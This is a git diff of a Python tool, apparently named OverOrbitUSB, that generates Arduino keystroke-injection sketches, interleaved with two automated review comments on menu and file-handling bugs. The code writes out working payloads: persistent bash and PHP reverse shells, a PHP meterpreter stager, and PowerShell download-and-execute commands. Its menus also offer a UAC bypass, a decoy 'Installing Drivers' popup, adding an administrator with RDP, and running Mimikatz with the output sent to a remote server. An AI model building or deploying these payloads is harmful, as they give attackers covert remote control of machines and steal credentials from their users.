} $a = unpack(\\\"Nlen\\\", $len); $len = $a[\\\"len\\\"];" + payload += " $b = \\\"\\\"; while (strlen($b) < $len) { switch ($s_type) { case \\\"stream\\\": $b .= fread($s, $len-strlen($b)); break; case \\\"socket\\\": $b .= socket_read($s, $len-strlen($b)); break;" + payload += " } } $GLOBALS[\\\"msgsock\\\"] = $s; $GLOBALS[\\\"msgsock_type\\\"] = $s_type; eval($b); die();'\");\n" + payload += " pressEnter();\n" + payload += "}\n" + + payloadFunc = 
"ReverseShell();\n" + + nixWriteFile(fileName,payloadFunc, payload) + coreUtils.msfRCfile(remoteIP,remotePort,'php/meterpreter/reverse_tcp',RCfile) diff --git a/osxCore.py b/osxCore.py new file mode 100644 index 0000000..409a632 --- /dev/null +++ b/osxCore.py 
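Review bot: In nixCore.py's `nixOption3`, the menu labels and the handlers disagree: the menu lists `3` as "Set Arduino sketch filename" and `4` as "Set Metasploit RC File name", but the `'3'` branch assigns `RCfile` via `coreUtils.getRCFileName` and the `'4'` branch assigns `fileName` via `coreUtils.getFileName`. Swapping either the two labels or the two branches makes them agree. The `'0'` branches of all three option functions call `nfoCore.nix1info()` and its siblings, yet this file's import list has no `import nfoCore` (osxCore.py in the same commit does), so choosing Info raises NameError.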
@@ -0,0 +1,366 @@ +#!/usr/bin/python +#uses HID-Project.h from https://github.com/NicoHood/HID, can be installed from Arduino Library Manager + +import sys +import argparse +import os +import subprocess +import coreUtils +import nfoCore + +def osxBanner(): + + coreUtils.clearScreen() + print "********************************************************************************************" + print "* *" + print "* *" + print "* OSX Payloads *" + print "* These Payloads are for OSX *" + print "* *" + print "********************************************************************************************" + print "\n" + +def osxMenu(): + + coreUtils.clearScreen() + menu = {} + menu['1']="Bash Reverse Shell without nc -e for OSX" + menu['2']="Reverse Shell in PHP for OSX" + menu['3']="meterpreter/reverse in PHP for OSX" + menu['42']="Main Menu" + menu['99']="Exit" + + while True: + osxBanner() + options=menu.keys() + options.sort(key=int) + for entry in options: + print entry, menu[entry] + + selection=raw_input("\nPlease Select: ") + if selection =='1': + osxOption1() + elif selection == '2': + osxOption2() + elif selection == '3': + osxOption3() + elif selection == '42': + coreUtils.clearScreen() + break + elif selection == '99': + exit() + else: + print "\n\n***That is not a valid option!***\n\n" + +def osxWriteFile(fileName,payloadFunc,payload): + + buffer = "#include \n" + buffer += "void setup() {\n" + buffer += " Keyboard.begin();\n" + buffer += " openTerminal();\n" + buffer += " delay(1500);\n" + + buffer += " " + payloadFunc + buffer += " closeTerminal();\n" + buffer += " Keyboard.end();\n" + buffer += "}\n" + + buffer += "void pressEnter(){\n" + buffer += " Keyboard.press(KEY_RETURN);\n" + buffer += " delay(100);\n" + buffer += " Keyboard.release(KEY_RETURN);\n" + buffer += "}\n" + + buffer += "void openTerminal(){\n" + buffer += " delay(500);\n" + buffer += " Keyboard.press(KEY_LEFT_GUI);\n" + buffer += " Keyboard.println(\" \");\n" + buffer += " delay(150);\n" + 
buffer += " Keyboard.release(KEY_LEFT_GUI);\n" + buffer += " delay(100);\n" + buffer += " Keyboard.println(\"terminal\");\n" + buffer += " delay(100);\n" + buffer += " pressEnter();\n" + buffer += " pressEnter();\n" + buffer += " delay(500);\n" + buffer += "}\n" + buffer += "\n" + + buffer += "void closeTerminal(){\n" + buffer += " Keyboard.press(KEY_LEFT_GUI);\n" + buffer += " Keyboard.println(\"m\");\n" + buffer += " delay(150);\n" + buffer += " Keyboard.release(KEY_LEFT_GUI);\n" + buffer += " delay(100);\n" + buffer += " pressEnter();\n" + buffer += "}\n" + buffer += "\n" + + buffer += payload + + buffer += "void loop()\n" + buffer += "{\n" + buffer += "}\n" + + fileName = coreUtils.checkINO(fileName) + file = open(fileName,'w') + file.write(buffer) + file.close() + + print "\n\noutput written to " + fileName + raw_input("\nPress Enter to continue and return to Main Menu...") + coreUtils.clearScreen() + +def osxOption1(): + + done = False + looper = False + remoteIP="" + remotePort="" + fileName="" + + while looper != True: + + coreUtils.clearScreen() + print "********************************************************************************************" + print "* *" + print "* Persistent Bash Reverse Shell without NetCat *" + print "* This payload will initiate a Bash reverse shell without Netcat *" + print "* Options are: 1. remote IP 2. 
Listening Port *" + print "* *" + print "********************************************************************************************" + print "\n" + + menu = {} + menu['0'] = "Info" + menu['1'] = "Set IP address of the remote server" + menu['2'] = "Set the listening port of the remote server" + menu['3'] = "Set Arduino sketch filename" + menu['4'] = "Write Arduino sketch" + menu['42']= "Return to previous menu" + menu['99']= "Exit" + + options=menu.keys() + options.sort(key=int) + for entry in options: + print entry, menu[entry] + + print "\n\n" + if remoteIP != "": + print "IP of the remote server set to -> " + remoteIP + if remotePort != "": + print "Listening port on the remote server set to -> " + remotePort + if fileName != "": + print "Arduino filename set to -> " + fileName + + selection=raw_input("\nPlease Select: ") + + if selection =='1': + remoteIP = raw_input("Please enter the IP address of the remote server to connect to: ") + elif selection == '2': + remotePort = raw_input("Please enter the listening port on the remote server:") + elif selection == '3': + fileName = coreUtils.getFileName('reverseCmdOSX.ino') + elif selection == '4': + if done == False: + print "\nYou have not set all the options" + raw_input("Press Enter to return to the menu and set all the options") + else: + looper = True + elif selection == '42': + coreUtils.clearScreen() + break + elif selection == '99': + exit() + elif selection == '0': + nfoCore.osx1info() + else: + print "\n\n***That is not a valid option!***\n\n" + + if remoteIP != "" and remotePort != "" and fileName != "": + done = True + + if done == True and looper == True: + payload = "void ReverseShell(){\n" + payload += "Keyboard.println(\"nohup bash -c \\\"while true;do bash -i >& /dev/tcp/" +remoteIP+ "/" +remotePort+ " 0>&1 2>&1; sleep 1;done\\\" 1>/dev/null &\");\n" + payload += " pressEnter();\n" + payload += "}\n" + + payloadFunc = "ReverseShell();\n" + + osxWriteFile(fileName,payloadFunc, payload) + + + +def 
osxOption2(): + + done = False + looper = False + remoteIP="" + remotePort="" + fileName="" + + while looper != True: + + coreUtils.clearScreen() + print "********************************************************************************************" + print "* *" + print "* PHP Reverse Shell *" + print "* This payload will initiate a reverse shell via PHP, requires PHP *" + print "* Options are: 1. remote IP 2. Listening Port *" + print "* *" + print "********************************************************************************************" + print "\n" + + menu = {} + menu['0'] = "Info" + menu['1'] = "Set IP address of the remote server" + menu['2'] = "Set the listening port of the remote server" + menu['3'] = "Set Arduino sketch filename" + menu['4'] = "Write Arduino sketch" + menu['42']= "Return to previous menu" + menu['99']= "Exit" + + options=menu.keys() + options.sort(key=int) + for entry in options: + print entry, menu[entry] + + print "\n\n" + if remoteIP != "": + print "IP of the remote server set to -> " + remoteIP + if remotePort != "": + print "Listening port on the remote server set to -> " + remotePort + if fileName != "": + print "Arduino filename set to -> " + fileName + + selection=raw_input("\nPlease Select: ") + + if selection =='1': + remoteIP = raw_input("Please enter the IP address of the remote server to connect to: ") + elif selection == '2': + remotePort = raw_input("Please enter the listening port on the remote server:") + elif selection == '3': + fileName = coreUtils.getFileName('revShellPHP.ino') + elif selection == '4': + if done == False: + print "\nYou have not set all the options" + raw_input("Press Enter to return to the menu and set all the options") + else: + looper = True + elif selection == '42': + coreUtils.clearScreen() + break + elif selection == '99': + exit() + elif selection == '0': + nfoCore.osx2info() + else: + print "\n\n***That is not a valid option!***\n\n" + + if remoteIP != "" and remotePort != "" and fileName != 
"": + done = True + + if done == True and looper == True: + + payload = "void ReverseShell(){\n" + payload += "Keyboard.println(\"php -r '$sock=fsockopen(\\\""+remoteIP+"\\\","+remotePort+");exec(\\\"/bin/sh -i <&3 >&3 2>&3\\\");'\");\n" + payload += " pressEnter();\n" + payload += "}\n" + + payloadFunc = "ReverseShell();\n" + + osxWriteFile(fileName,payloadFunc, payload) + + +def osxOption3(): + + done = False + looper = False + remoteIP="" + remotePort="" + fileName="" + RCfile="" + + while looper != True: + + coreUtils.clearScreen() + print "********************************************************************************************" + print "* *" + print "* PHP Meterpreter Reverse TCP *" + print "* This payload will initiate a meterpreter/reverse_tcp via PHP, requires PHP *" + print "* Options are: 1. remote IP 2. Listening Port *" + print "* *" + print "********************************************************************************************" + print "\n" + + menu = {} + menu['0'] = "Info" + menu['1'] = "Set IP address of the remote server" + menu['2'] = "Set the listening port of the remote server" + menu['3'] = "Set Arduino sketch filename" + menu['4'] = "Set Metasploit RC File name" + menu['5'] = "Write Arduino sketch" + menu['42']= "Return to previous menu" + menu['99']= "Exit" + + options=menu.keys() + options.sort(key=int) + for entry in options: + print entry, menu[entry] + + print "\n\n" + if remoteIP != "": + print "IP of the remote server set to -> " + remoteIP + if remotePort != "": + print "Listening port on the remote server set to -> " + remotePort + if RCfile != "": + print "Metasploit RC File name set to -> " + RCfile + if fileName != "": + print "Arduino filename set to -> " + fileName + + selection=raw_input("\nPlease Select: ") + + if selection =='1': + remoteIP = raw_input("Please enter the IP address of the remote server to connect to: ") + elif selection == '2': + remotePort = raw_input("Please enter the listening port on the remote 
server:") + elif selection == '3': + fileName = coreUtils.getFileName('reverseMetPHP.ino') + elif selection == '4': + RCfile = coreUtils.getRCFileName('reverseMetPHP.rc') + + elif selection == '5': + if done == False: + print "\nYou have not set all the options" + raw_input("Press Enter to return to the menu and set all the options") + else: + looper = True + elif selection == '42': + coreUtils.clearScreen() + break + elif selection == '99': + exit() + elif selection == '0': + nfoCore.osx3info() + else: + print "\n\n***That is not a valid option!***\n\n" + + if remoteIP != "" and remotePort != "" and fileName != "" and RCfile !="": + done = True + + if done == True and looper == True: + payload = "void ReverseShell(){\n" + payload += "Keyboard.println(\"php -r 'error_reporting(0); $ip = \\\""+remoteIP+"\\\"; $port = "+remotePort+"; if (($f = \\\"stream_socket_client\\\") && is_callable($f)) { $s = $f(\\\"tcp://{$ip}:{$port}\\\");" + payload += " $s_type = \\\"stream\\\"; } elseif (($f = \\\"fsockopen\\\") && is_callable($f)) { $s = $f($ip, $port); $s_type = \\\"stream\\\"; } elseif (($f = \\\"socket_create\\\") && is_callable($f))" + payload += " { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = \\\"socket\\\"; } else { die(\\\"no socket funcs\\\"); } if (!$s) { die(\\\"no socket\\\");" + payload += " } switch ($s_type) { case \\\"stream\\\": $len = fread($s, 4); break; case \\\"socket\\\": $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack(\\\"Nlen\\\", $len); $len = $a[\\\"len\\\"];" + payload += " $b = \\\"\\\"; while (strlen($b) < $len) { switch ($s_type) { case \\\"stream\\\": $b .= fread($s, $len-strlen($b)); break; case \\\"socket\\\": $b .= socket_read($s, $len-strlen($b)); break;" + payload += " } } $GLOBALS[\\\"msgsock\\\"] = $s; $GLOBALS[\\\"msgsock_type\\\"] = $s_type; eval($b); die();'\");\n" + payload += " pressEnter();\n" + payload += "}\n" + + payloadFunc = 
"ReverseShell();\n" + + osxWriteFile(fileName,payloadFunc, payload) + coreUtils.msfRCfile(remoteIP,remotePort,'php/meterpreter/reverse_tcp',RCfile) diff --git a/winCore.py b/winCore.py new file mode 100644 index 0000000..4582ac2 --- /dev/null +++ b/winCore.py 
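Review bot: In `osxWriteFile` the sketch is written with a bare `file = open(fileName,'w')`, `file.write(buffer)`, `file.close()` sequence, so an I/O error during the write leaves the handle unclosed and surfaces as a raw traceback in the middle of the menu loop. An existing file of the same name is also overwritten without a prompt, unless `coreUtils.checkINO` (not shown in this hunk) guards against that. I would write it as `with open(fileName, 'w') as sketch:` followed by `sketch.write(buffer)`, which also stops the locals `file` and `buffer` from shadowing the Python 2 builtins of the same name. `WinWriteFile` in the winCore.py hunk uses the same three lines and would take the same change.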
@@ -0,0 +1,1512 @@ +#!/usr/bin/python +#uses HID-Project.h from https://github.com/NicoHood/HID, can be installed from Arduino Library Manager + +import sys +import argparse +import os +import subprocess +import coreUtils +import nfoCore + +def WinBanner(): + + coreUtils.clearScreen() + print "********************************************************************************************" + print "* *" + print "* *" + print "* Windows Payloads *" + print "* These Payloads are made mostly for Windows 7, 8.1 and 10, as most use Powershell *" + print "* *" + print "********************************************************************************************" + print "\n" + +def WinMenu(): + + menu = {} + menu['1']="Download and Execute Binary for Windows" + menu['2']="Download and Execute Powershell for Windows" + menu['3']="Execute Custom Powershell script for Windows" + menu['4']="Reverse TCP CMD Powershell for Windows" + menu['5']="Add Administrator and Enable RDP for Windows" + menu['6']="Download and run Invoke-Mimikatz.ps1, Send output to Remote Server for Windows" + menu['7']="Change DNS Entry in Hostfile for Windows" + menu['8']="Download File and Place on Current User's Desktop for Windows" + menu['9']="Reverse TCP CMD prompt for Windows" + menu['10']="windows/meterpreter/reverse_https in Powershell for Windows" + menu['11']="Get username and computer name and send to a remote listener for Windows" + menu['42']="Return to main menu" + menu['99']="Exit" + + while True: + WinBanner() + options=menu.keys() + options.sort(key=int) + for entry in options: + print entry, menu[entry] + + selection=raw_input("\nPlease Select: ") + if selection =='1': + WinOption1() + elif selection == '2': + WinOption2() + elif selection == '3': + WinOption3() + elif selection == '4': + WinOption4() + elif selection == '5': + WinOption5() + elif selection == '6': + WinOption6() + elif selection == '7': + WinOption7() + elif selection == '8': + WinOption8() + elif selection == '9': + 
WinOption9() + elif selection == '10': + WinOption10() + elif selection == '11': + WinOption11() + elif selection == '42': + coreUtils.clearScreen() + break + elif selection == '99': + exit() + else: + print "\n\n***That is not a valid option!***\n\n" + +def notificationBubble(): + + title = "Installing Drivers" + message = "Please do not remove the device" + while True: + + answer = raw_input("Do you want to include a notifiction bubble as a distraction? Press Enter for default Yes (Y/n/?): ") + + if answer in ('Y','y','yes','Yes','YES'): + + while True: + print "\n" + print "Current notification bubble title is: " + title + print "Current notification bubble message is: " + message + + print "\n" + customize = raw_input("Do you want to change the notification bubble text? (Y/n):") + + if customize in ('Y','y','yes','Yes','YES',''): + print "\n" + title = raw_input("Please enter the Title of the notification bubble -> ") + message = raw_input("Please enter the Message of the notification bubble -> ") + + elif customize in ('N','n','no','No','NO',''): + + buffer = "void bubblePopup(){\n" + buffer += " Keyboard.println(\"wlrmdr.exe -s 60000 -f 1 -t \\\""+title+"\\\" -m \\\""+message+"\\\"\");\n" + buffer += " delay(100);\n" + buffer += " pressEnter();\n" + buffer += " delay(750);\n" + buffer += "}\n" + + setting = 'Enabled' + + return buffer, setting + + break + + elif answer in ('N','n','no','No','NO'): + buffer = "void bubblePopup(){\n" + buffer += "}\n" + + setting = 'Disabled' + return buffer, setting + + elif answer == '?': + nfoCore.bubbleInfo() + else: + print "\nThat is not a valid option, enabling the default option Notification Bubble" + buffer = "void bubblePopup(){\n" + buffer += " Keyboard.println(\"wlrmdr.exe -s 60000 -f 1 -t \\\"Installing Drivers\\\" -m \\\"Please do not remove the device\\\"\");\n" + buffer += " pressEnter();\n" + buffer += " delay(750);\n" + buffer += "}\n" + + setting = 'Enabled' + + return buffer, setting + + +def 
checkUACBypass(): + + while True: + + bypassUACoption = raw_input("Please select a bypass UAC method:\n 1. No UAC Bypass\n 2. https://goo.gl/fPl4tm for bypass(no UAC popup)\n 3. run As (UAC popup visable)\n ?. For more information\n Press Enter for default (None): ") + + if bypassUACoption == "": + bypassUACoption = "1" + bypassUAC = noBypass() + bypassType = "None" + return bypassType,bypassUAC + elif bypassUACoption == "1": + bypassUAC = noBypass() + bypassType = "None" + return bypassType,bypassUAC + elif bypassUACoption == "2": + bypassUAC = BypassUACExploit() + bypassType = "https://goo.gl/fPl4tm (no visible popup)" + return bypassType,bypassUAC + elif bypassUACoption == "3": + bypassUAC = BypassUACAdmin() + bypassType = "run As (visible popup)" + return bypassType,bypassUAC + elif bypassUACoption == '?': + nfoCore.UACBypassInfo() + else: + print "That is not a valid option, giving you the default option of None" + bypassUAC = noBypass() + bypassType = "None" + raw_input("\nPress Enter to return to the previous Menu...") + return bypassType,bypassUAC + +def noUAVBypass(): + + buffer ="void bypassUAC(){\n" + buffer +=" \n" + buffer +="}\n" + +def BypassUACExploit(): + + buffer = "void bypassUAC(){\n" + buffer +=" Keyboard.press(KEY_LEFT_GUI);\n" + buffer +=" Keyboard.press('r');\n" + buffer +=" delay(200);\n" + buffer += " Keyboard.release(KEY_LEFT_GUI);\n" + buffer += " Keyboard.release('r');\n" + buffer +=" Keyboard.println(\"cmd.exe /T:01 /K mode CON: COLS=15 LINES=1 && title Installing Drivers\");\n" + buffer +=" delay(1000);\n" + buffer +=" pressEnter();\n" + buffer +=" Keyboard.println(\"powershell -NoP -NonI -W Hidden -Exec Bypass \\\"IEX (New-Object System.Net.WebClient).DownloadString(\'https://goo.gl/fPl4tm\');Bypass-UAC -Method ucmDismMethod;\\\"\");\n" + buffer +=" pressEnter();\n" + buffer +=" delay(1750);\n" + buffer +="}\n" + + return(buffer) + +def noBypass(): + + buffer = "void bypassUAC(){\n" + buffer += " Keyboard.press(KEY_LEFT_GUI);\n" + 
buffer += " Keyboard.press('r');\n" + buffer += " delay(200);\n" + buffer += " Keyboard.release(KEY_LEFT_GUI);\n" + buffer += " Keyboard.release('r');\n" + buffer += " delay(100);\n" + buffer += " Keyboard.println(\"cmd.exe /T:01 /K mode CON: COLS=15 LINES=1 && title Installing Drivers\");\n" + buffer += " delay(100);\n" + buffer += " pressEnter();\n" + buffer += " delay(500);\n" + buffer += "}\n" + + return(buffer) + +def BypassUACAdmin(): + + buffer = "void bypassUAC(){\n" + buffer += " Keyboard.press(KEY_LEFT_GUI);\n" + buffer += " Keyboard.press('r');\n" + buffer += " delay(200);\n" + buffer += " Keyboard.release(KEY_LEFT_GUI);\n" + buffer += " Keyboard.release('r');\n" + buffer += " delay(100);\n" + buffer += " Keyboard.println(\"powershell Start-Process cmd.exe -Verb runAs\");\n" + buffer += " delay(100);\n" + buffer += " pressEnter();\n" + buffer += " delay(1000);\n" + buffer += "\n" + buffer += " Keyboard.press(KEY_LEFT_ALT);\n" + buffer += " delay(100);\n" + buffer += " Keyboard.println(\"Y\");\n" + buffer += " Keyboard.release(KEY_LEFT_ALT);\n" + buffer += " delay(500);\n" + buffer += "\n" + buffer += " Keyboard.println(\"cmd.exe /T:01 /K mode CON: COLS=15 LINES=1 && title Installing Drivers\");\n" + buffer += " delay(100);\n" + buffer += " pressEnter();\n" + buffer += " delay(200);\n" + buffer += "}\n" + + return (buffer) + +def WinWriteFile(fileName,payloadFunc,bypassUAC,payload, bubble): + + buffer = "//This Arduino Sketch was generated with the OrbitUSB tool, located here: https://github.com/ChandraOrbit/OverOrbitUSB\n\n" + buffer += "#include \n" + buffer += "void setup() {\n" + buffer += " Keyboard.begin();\n" + buffer += " hurryUp();\n" + buffer += " killCaps();\n" + buffer += " bypassUAC();\n" + buffer += " bubblePopup();\n" + buffer += " //THIS DELAY IS IMPORTANT, AND MAY NEED TO BE MODIFIED FOR YOUR TARGET\n" + buffer += " delay(1000);\n" + + buffer += " " + payloadFunc + + buffer += " Keyboard.end();\n" + buffer += "}\n" + + buffer += "void 
pressEnter(){\n" + buffer += " Keyboard.press(KEY_RETURN);\n" + buffer += " delay(100);\n" + buffer += " Keyboard.release(KEY_RETURN);\n" + buffer += "}\n" + + buffer += "void hurryUp(){\n" + buffer += " boolean areWeThereYet = capsCheck();\n" + buffer += " while (areWeThereYet == capsCheck()){\n" + buffer += " hitCaps();\n" + buffer += " }\n" + buffer += " hitCaps();\n" + buffer += "}\n" + buffer += "\n" + + buffer += "boolean capsCheck(){\n" + buffer += " if (BootKeyboard.getLeds() & LED_CAPS_LOCK){\n" + buffer += " return true;\n" + buffer += " }\n" + buffer += " else{\n" + buffer += " return false;\n" + buffer += " }\n" + buffer += "}\n" + buffer += "\n" + + buffer += "void hitCaps(){\n" + buffer += " Keyboard.press(KEY_CAPS_LOCK);\n" + buffer += " delay(100);\n" + buffer += " Keyboard.release(KEY_CAPS_LOCK);\n" + buffer += "}\n" + buffer += "\n" + + buffer += "void killCaps(){\n" + buffer += " if (capsCheck())\n" + buffer += " {\n" + buffer += " hitCaps();\n" + buffer += " }\n" + buffer += "}\n" + buffer += "\n" + + buffer += bypassUAC + + buffer += bubble + + buffer += payload + + buffer += "void loop()\n" + buffer += "{\n" + buffer += "}\n" + + fileName = coreUtils.checkINO(fileName) + file = open(fileName,'w') + file.write(buffer) + file.close() + + print "\n\noutput written to " + fileName + raw_input("\nPress Enter to continue and return to Main Menu...") + coreUtils.clearScreen() + + +def WinOption1(): + + done = False + looper = False + URL="" + fileName="" + bypassUACoption="" + bubbleSetting="" + + while looper != True: + + coreUtils.clearScreen() + print "********************************************************************************************" + print "* *" + print "* Download and Execute Binary for Windows *" + print "* This payload will download a binary and execute it, then close the powershell prompt *" + print "* Options are: 1. The URL 2. The binary name 3. How to bypass UAC 4. 
The output File name *" + print "* *" + print "********************************************************************************************" + print "\n" + + menu = {} + menu['0'] = "Info" + menu['1'] = "Set URL of the binary to download and execute" + menu['2'] = "Set bypassUAC mode" + menu['3'] = "Set Arduino sketch filename" + menu['4'] = "Set notification bubble option" + menu['5'] = "Write Arduino sketch" + menu['42']= "Return to previous menu" + menu['99']= "Exit" + + options=menu.keys() + options.sort(key=int) + for entry in options: + print entry, menu[entry] + + print "\n\n" + if URL != "": + print "URL of binary set to -> " + URL + if bypassUACoption != "": + print "bypassUAC technique set to -> " + bypassUACoption + if bubbleSetting != "": + print "Notification bubble set to -> " + bubbleSetting + if fileName != "": + print "Arduino filename set to -> " + fileName + + selection=raw_input("\nPlease Select: ") + + if selection =='1': + URL = raw_input("Please enter the full URL of the binary (please include \"http://\" or \"https://\"): ") + binary = coreUtils.getBinary(URL) + elif selection == '2': + bypassUACoption,bypassUAC = checkUACBypass() + elif selection == '3': + fileName = coreUtils.getFileName('dropBinary.ino') + elif selection == '4': + bubble, bubbleSetting = notificationBubble() + elif selection == '5': + if done == False: + print "\nYou have not set all the options" + raw_input("Press Enter to return to the menu and set all the options") + else: + looper = True + elif selection == '42': + coreUtils.clearScreen() + break + elif selection == '99': + exit() + elif selection == '0': + nfoCore.Win1info() + else: + print "\n\n***That is not a valid option!***\n\n" + + if URL != "" and fileName != "" and bypassUACoption != "" and bubbleSetting != "": + done = True + + if done == True and looper == True: + payload = "void downBinary(){\n" + if bypassUACoption != "https://goo.gl/fPl4tm (no visible popup)": + payload += " 
Keyboard.println(\"cd\\\\users\\\\%USERNAME%\");\n" + payload += " delay(100);\n" + payload += " pressEnter();\n" + if bypassUACoption == "https://goo.gl/fPl4tm (no visible popup)": + payload += " Keyboard.println(\"powershell -w hidden \\\"$source = '" +URL+ "\'; $destination = '" +binary+ "'; Invoke-WebRequest $source -OutFile $destination;start-process '" +binary+"';exit;\\\"\");\n" + else: + payload += " Keyboard.println(\"powershell -w hidden \\\"$source = '" +URL+ "\'; $destination = '" +binary+ "'; Invoke-WebRequest $source -OutFile $destination;start-process '" +binary+"';exit;\\\"\");\n" + payload += " delay(100);\n" + payload += " pressEnter();\n" + + + if bypassUACoption == "run As (visible popup)": + payload += " Keyboard.println(\"exit\");\n" + payload += " delay(100);\n" + payload += " pressEnter();\n" + payload += " Keyboard.println(\"exit\");\n" + payload += " delay(100);\n" + payload += " pressEnter();\n" + elif bypassUACoption == "None": + payload += " Keyboard.println(\"exit\");\n" + payload += " delay(100);\n" + payload += " pressEnter();\n" + payload += "}\n" + + + payloadFunc = "downBinary();\n" + + WinWriteFile(fileName,payloadFunc,bypassUAC,payload,bubble) + + + + +def WinOption2(): + + done = False + looper = False + URL="" + fileName="" + bypassUACoption="" + bubbleSetting="" + + while looper != True: + + coreUtils.clearScreen() + print "********************************************************************************************" + print "* *" + print "* Download and Execute Powershell for Windows *" + print "* This payload will download a powershell script then run it *" + print "* Options are: 1. The URL 2. The script name 3. How to bypass UAC 4. 
The output File name *" + print "* *" + print "********************************************************************************************" + print "\n" + + menu = {} + menu['0'] = "Info" + menu['1'] = "Set URL of the powershell script to download and execute" + menu['2'] = "Set bypassUAC mode" + menu['3'] = "Set Arduino sketch filename" + menu['4'] = "Set notification bubble option" + menu['5'] = "Write Arduino sketch" + menu['42']= "Return to previous menu" + menu['99']= "Exit" + + options=menu.keys() + options.sort(key=int) + for entry in options: + print entry, menu[entry] + + print "\n\n" + if URL != "": + print "URL of Powershell script set to -> " + URL + if bypassUACoption != "": + print "bypassUAC technique set to -> " + bypassUACoption + if bubbleSetting != "": + print "Notification bubble set to -> " + bubbleSetting + if fileName != "": + print "Arduino filename set to -> " + fileName + + selection=raw_input("\nPlease Select: ") + + if selection =='1': + URL = raw_input("Please enter the full URL of the Powershell script (please include \"http://\" or \"https://\"): ") + scriptName = coreUtils.getBinary(URL) + elif selection == '2': + bypassUACoption,bypassUAC = checkUACBypass() + elif selection == '3': + fileName = coreUtils.getFileName('downPSH.ino') + elif selection == '4': + bubble, bubbleSetting = notificationBubble() + elif selection == '5': + if done == False: + print "\nYou have not set all the options" + raw_input("Press Enter to return to the menu and set all the options") + else: + looper = True + elif selection == '42': + coreUtils.clearScreen() + break + elif selection == '99': + exit() + elif selection == '0': + nfoCore.Win2info() + else: + print "\n\n***That is not a valid option!***\n\n" + + if URL != "" and fileName != "" and bypassUACoption != "" and bubbleSetting != "": + done = True + + if done == True and looper == True: + + payload = "void downExecPSH(){\n" + payload += " Keyboard.println(\"powershell -w hidden \\\"IEX (New-Object 
Net.WebClient).DownloadString(\'" +URL+ "\');" + scriptName + ";exit;\\\"\");\n" + payload += " pressEnter();\n" + if bypassUACoption == "run As (visible popup)": + payload += " Keyboard.println(\"exit\");\n" + payload += " delay(100);\n" + payload += " pressEnter();\n" + payload += " Keyboard.println(\"exit\");\n" + payload += " delay(100);\n" + payload += " pressEnter();\n" + elif bypassUACoption == "None": + payload += " Keyboard.println(\"exit\");\n" + payload += " delay(100);\n" + payload += " pressEnter();\n" + payload += "}\n" + + payloadFunc = "downExecPSH();\n" + + WinWriteFile(fileName,payloadFunc,bypassUAC,payload,bubble) + +def WinOption3(): + + done = False + looper = False + powershell = "" + fileName="" + bypassUACoption="" + bubbleSetting="" + + while looper != True: + + coreUtils.clearScreen() + print "********************************************************************************************" + print "* *" + print "* Execute Custom Powershell script for Windows *" + print "* This payload will run custom powershell script *" + print "* Options are: 1. Powershell code 2. 
The output File name *" + print "* *" + print "********************************************************************************************" + print "\n" + + menu = {} + menu['0'] = "Info" + menu['1'] = "Set powershell script to execute" + menu['2'] = "Set bypassUAC mode" + menu['3'] = "Set Arduino sketch filename" + menu['4'] = "Set notification bubble option" + menu['5'] = "Write Arduino sketch" + menu['6'] = "Display powershell script" + menu['42']= "Return to previous menu" + menu['99']= "Exit" + + options=menu.keys() + options.sort(key=int) + for entry in options: + print entry, menu[entry] + + print "\n\n" + if powershell != "": + print "powershell script is set" + if bypassUACoption != "": + print "bypassUAC technique set to -> " + bypassUACoption + if bubbleSetting != "": + print "Notification bubble set to -> " + bubbleSetting + if fileName != "": + print "Arduino filename set to -> " + fileName + + selection=raw_input("\nPlease Select: ") + + if selection =='1': + powershell = raw_input("\"powershell -nop -w hidden\" will automatically be added to the payload\nPlease add \"-enc\" at the beginning if your script is fully encoded\nPlease input your powershell script: ") + powershell = coreUtils.checkQuotes(powershell) + elif selection == '2': + bypassUACoption,bypassUAC = checkUACBypass() + elif selection == '3': + fileName = coreUtils.getFileName('powershell.ino') + elif selection == '4': + bubble, bubbleSetting = notificationBubble() + elif selection == '5': + if done == False: + print "\nYou have not set all the options" + raw_input("Press Enter to return to the menu and set all the options") + else: + looper = True + elif selection == '6': + if powershell == "": + print "you have not entered a powershell script yet" + raw_input("Please press enter to continue") + coreUtils.clearScreen() + else: + print "Powershell script set as -> " +powershell + raw_input("Please press enter to continue") + elif selection == '42': + coreUtils.clearScreen() + break + 
elif selection == '99': + exit() + elif selection == '0': + nfoCore.Win3info() + else: + print "\n\n***That is not a valid option!***\n\n" + + if powershell != "" and fileName != "" and bypassUACoption != "" and bubbleSetting != "": + done = True + + if done == True and looper == True: + + payload = "void powershell(){\n" + payload += " Keyboard.println(\"powershell -nop -w hidden " + powershell + "\");\n" + payload += " pressEnter();\n" + payload += " Keyboard.println(\"exit\");\n" + payload += " delay(100);\n" + payload += " pressEnter();\n" + payload += "}\n" + + payloadFunc = "powershell();\n" + + + WinWriteFile(fileName, payloadFunc,bypassUAC,payload,bubble) + +def WinOption4(): + + done = False + looper = False + remoteIP="" + remotePort = "" + fileName="" + bypassUACoption="" + bubbleSetting="" + + while looper != True: + + coreUtils.clearScreen() + print "********************************************************************************************" + print "* *" + print "* Reverse TCP CMD in Powershell for Windows *" + print "* This payload will create a Reverse TCP CMD Prompt via Powershell *" + print "* Options are: 1. The IP 2. The listening port 3. 
The output File name *" + print "* *" + print "********************************************************************************************" + print "\n" + + menu = {} + menu['0'] = "Info" + menu['1'] = "Set the remote IP of the listening server" + menu['2'] = "Set the remote Port of the listening server" + menu['3'] = "Set bypassUAC mode" + menu['4'] = "Set Arduino sketch filename" + menu['5'] = "Set notification bubble option" + menu['6'] = "Write Arduino sketch" + menu['42']= "Return to previous menu" + menu['99']= "Exit" + + options=menu.keys() + options.sort(key=int) + for entry in options: + print entry, menu[entry] + + print "\n\n" + if remoteIP != "": + print "IP of the remote server is set to -> " + remoteIP + if remotePort != "": + print "The listening port of the remote server is -> " + remotePort + if bypassUACoption != "": + print "bypassUAC technique set to -> " + bypassUACoption + if bubbleSetting != "": + print "Notification bubble set to -> " + bubbleSetting + if fileName != "": + print "Arduino filename set to -> " + fileName + + selection=raw_input("\nPlease Select: ") + + if selection =='1': + remoteIP = raw_input("Please enter the IP of the remote server: ") + elif selection == '2': + remotePort = raw_input("Please enter the listening port of the remote server: ") + elif selection == '3': + bypassUACoption,bypassUAC = checkUACBypass() + elif selection == '4': + fileName = coreUtils.getFileName('reverseTCP.ino') + elif selection == '5': + bubble, bubbleSetting = notificationBubble() + elif selection == '6': + if done == False: + print "\nYou have not set all the options" + raw_input("Press Enter to return to the menu and set all the options") + else: + looper = True + elif selection == 